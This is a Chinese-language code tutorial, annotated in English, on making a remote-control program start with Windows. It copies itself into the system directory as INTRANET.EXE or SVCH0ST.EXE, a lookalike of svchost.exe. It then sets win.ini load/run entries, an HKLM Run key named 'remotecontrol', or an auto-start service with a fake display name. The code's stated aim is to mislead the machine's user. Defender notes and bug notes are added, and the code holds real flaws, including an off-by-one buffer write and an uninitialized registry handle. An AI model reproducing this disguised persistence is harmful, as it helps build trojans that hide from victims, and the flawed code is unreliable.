可以采用以下方式实现自启动:
// Copy this executable into the system directory.
// Defender note: the observable artifact of this step is a new executable named
// INTRANET.EXE appearing in the Windows system directory, written by CopyFile from
// a file in the current working directory ("autoboot.exe"). Unexpected executables
// created in the system directory are a standard detection signal.
TCHAR TempPath[MAX_PATH];
CString temp;
// System directory (e.g. the System32 folder), resolved at run time.
::GetSystemDirectory(TempPath ,MAX_PATH);
temp = TempPath;
temp = temp + _T("\\INTRANET.EXE");
// Number of TCHARs in the path, not bytes; used below both as the buffer size and
// as the data length handed to RegSetValueEx in the next snippet.
int len = temp.GetLength();
// Raw byte buffer for the registry write. Each TCHAR is narrowed to one BYTE, so in
// a Unicode build this does not preserve the string as stored in `temp`.
LPBYTE lpb = new BYTE[len];
for(int j = 0; j < len; j++)
{
lpb[j] = temp[j];
}
// Terminator is written at index `len`, i.e. one past the `len`-byte allocation
// above; `j` is also referenced here after the loop that declared it.
lpb[j] = 0;
// Copy this program into the system directory under the name intranet.exe; the author's
// stated purpose is to mislead the user of the controlled machine. FALSE = overwrite if present.
CopyFile("autoboot.exe", temp ,FALSE);
1.修改WIN.INI(C:\WINDOWS\WIN.INI)文件:
// Method 1: legacy win.ini autostart. Writes `temp` (the INTRANET.EXE path built
// earlier) to both the [windows] load= and run= entries of a hard-coded
// c:\windows\win.ini. Defender note: these two entries are a long-known autostart
// location; any process writing load=/run= values into win.ini is worth alerting on.
// The path is hard-coded, so this only works when Windows lives on C:\WINDOWS.
WritePrivateProfileString(_T("windows"), _T("load"), temp, _T("c:\\windows\\win.ini"));
WritePrivateProfileString(_T("windows"), _T("run"), temp, _T("c:\\windows\\win.ini"));
2.采用加载注册表方式启动:
// Method 2: machine-wide Run key. Adds a REG_SZ value named "remotecontrol" under
// HKLM\Software\Microsoft\Windows\CurrentVersion\Run pointing at the copied binary.
// Defender note: this value name and target are the persistence artifact to look for;
// writing under HKLM normally requires administrative rights, so the write itself
// (KEY_WRITE on HKLM\...\Run) is a high-signal event for registry auditing.
HKEY hKey;
LPCTSTR data_Set="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE,data_Set,0,KEY_WRITE,&hKey));
if(ret0 != ERROR_SUCCESS)
{
// On failure only a message box is shown; execution continues into RegSetValueEx
// with `hKey` left uninitialized.
MessageBox("错误0");
}
// Data is `lpb` from the earlier snippet: `len` bytes, one per TCHAR of the path,
// passed without a terminating NUL in the length.
long ret1=(::RegSetValueEx(hKey,_T("remotecontrol"),NULL,REG_SZ,lpb,len));
if(ret1!=ERROR_SUCCESS)
{// Check whether the Run-key write succeeded
MessageBox("错误1");
}
// Close the registry key
::RegCloseKey(hKey);
3.注册为系统服务:
// Method 3: register as a Windows service. Forward declarations for the service
// skeleton below. `DeleteService()` here is a zero-argument overload that coexists
// with the Win32 API `DeleteService(SC_HANDLE)`; the body of the former calls the latter.
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv); // Service entry point called by the SCM
void WINAPI CmdStart(void); // The program's own code, started once the service is running
void WINAPI ServiceCtrlHandler(DWORD Opcode); // Service control handler (stop/pause/continue/interrogate)
BOOL InstallService(); // Installs the service
BOOL DeleteService(); // Removes the service
在main函数中执行下列:
// Executed from main(). SERVR_NAME is defined elsewhere (not shown on this page).
SERVICE_TABLE_ENTRY DispatchTable[]={{SERVR_NAME,ServiceMain},{NULL,NULL}}; // the trailing NULL entry terminates the table
// Hands the thread to the SCM when launched as a service; when launched interactively
// this call returns (with an error) and execution falls through to InstallService().
// NOTE(review): that appears to be the intended install-vs-run switch — confirm.
StartServiceCtrlDispatcher(DispatchTable);
InstallService(); // Install the service
// Service entry point. Reports START_PENDING, registers the control handler, then
// reports RUNNING and calls CmdStart(). `m_ServiceStatus`, `m_ServiceStatusHandle`
// and `bRunning` are globals defined elsewhere (not shown on this page).
// argc/argv (service start arguments) are not used.
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
m_ServiceStatus.dwServiceType = SERVICE_WIN32;
m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP; // only STOP is advertised, yet the handler below also processes PAUSE/CONTINUE
m_ServiceStatus.dwWin32ExitCode = 0;
m_ServiceStatus.dwServiceSpecificExitCode = 0;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
m_ServiceStatusHandle = RegisterServiceCtrlHandler(SERVR_NAME,ServiceCtrlHandler);
// Registration failed: return without ever reporting a state to the SCM.
if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)
return;
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; // Set the service state
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
// SERVICE_STATUS has seven members that together describe the service's current state.
// All of them must be set correctly before the structure is passed to SetServiceStatus.
SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
bRunning=true;
//*
CmdStart(); // Start the service's own program logic
//*
return;
}
// Service control handler invoked by the SCM. Only the STOP case reports the new
// state back via SetServiceStatus; PAUSE and CONTINUE update the global status
// struct without notifying the SCM.
// Opcode: one of the SERVICE_CONTROL_* codes.
void WINAPI ServiceCtrlHandler(DWORD Opcode)// Service control handler
{
switch(Opcode)
{
case SERVICE_CONTROL_PAUSE:
m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
// Report STOPPED to the SCM and clear the run flag read by the worker code.
m_ServiceStatus.dwWin32ExitCode = 0;
m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus);
bRunning=false;
break;
case SERVICE_CONTROL_INTERROGATE:
// Nothing is reported here; the SCM keeps the last status it received.
break;
}
return;
}
// Installs this executable as an auto-start service.
// Steps: copy the running image into the system directory as SVCH0ST.EXE, then
// create and start a service named SERVR_NAME whose display name is
// "Windows File Manage." and whose binary is that copy.
// Defender note: the file name SVCH0ST.EXE uses a zero in place of the letter O to
// resemble the legitimate svchost.exe; a lookalike system binary name plus a newly
// created auto-start service (SC_MANAGER_ALL_ACCESS, which requires administrative
// rights) are the artifacts to hunt for in file and service-creation telemetry.
// Returns TRUE on success, FALSE if the copy, SCM open, service creation or start fails.
// The SCM handle `schSCManager` is not closed on any path, and `schService` is not
// closed when StartService fails.
BOOL InstallService() // Installs the service
{
char strDir[1024];
SC_HANDLE schSCManager,schService;
// The current-directory result is immediately overwritten by GetModuleFileName.
GetCurrentDirectory(1024,strDir);
GetModuleFileName(NULL,strDir,sizeof(strDir));
char chSysPath[1024];
GetSystemDirectory(chSysPath,sizeof(chSysPath));
strcat(chSysPath,"\\SVCH0ST.EXE");
if(!CopyFile(strDir,chSysPath,FALSE))
return FALSE; // the running binary is copied into the system directory; abort if that fails
// From here on strDir holds the path of the copy, not of the running image.
strcpy(strDir,chSysPath);
schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
return false;
LPCTSTR lpszBinaryPathName=strDir;
schService = CreateService(schSCManager,SERVR_NAME,"Windows File Manage.", // registers the service in the SCM database
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS, // service type
SERVICE_AUTO_START, // start type: started automatically at boot
SERVICE_ERROR_NORMAL,
lpszBinaryPathName, // path of the service binary (the copy in the system directory)
NULL,
NULL,
NULL,
NULL,
NULL);
if (schService == NULL)
return false;
if(!StartService(schService,NULL,NULL)) // start the service
return FALSE;
CloseServiceHandle(schService);
return true;
}
// Removes the service installed by InstallService(): deletes the SVCH0ST.EXE copy
// from the system directory, then marks the service for deletion via the Win32
// DeleteService(SC_HANDLE) API (the one-argument overload, not this function).
// Returns TRUE on success, FALSE at the first failing step. The file is deleted
// before the service entry, so a failed DeleteFile leaves the service registered.
// The SCM handle `schSCManager` is never closed; the final `return TRUE;` is unreachable.
BOOL DeleteService()
{
SC_HANDLE schSCManager;
SC_HANDLE hService;
schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
char chSysPath[1024];
GetSystemDirectory(chSysPath,sizeof(chSysPath));
strcat(chSysPath,"\\SVCH0ST.EXE");
if (schSCManager == NULL)
return false;
hService=OpenService(schSCManager,SERVR_NAME,SERVICE_ALL_ACCESS);
if (hService == NULL)
return false;
if(DeleteFile(chSysPath)==0)
return false;
// Win32 API call; the service is deleted once its last handle is closed below.
if(DeleteService(hService)==0)
return false;
if(CloseServiceHandle(hService)==0)
return false;
else
return true;
return TRUE;
}
// Placeholder for the program's own logic; called from ServiceMain once the service
// reports RUNNING. Empty on this page.
void WINAPI CmdStart(void)
{
//..... the program's own code goes here
}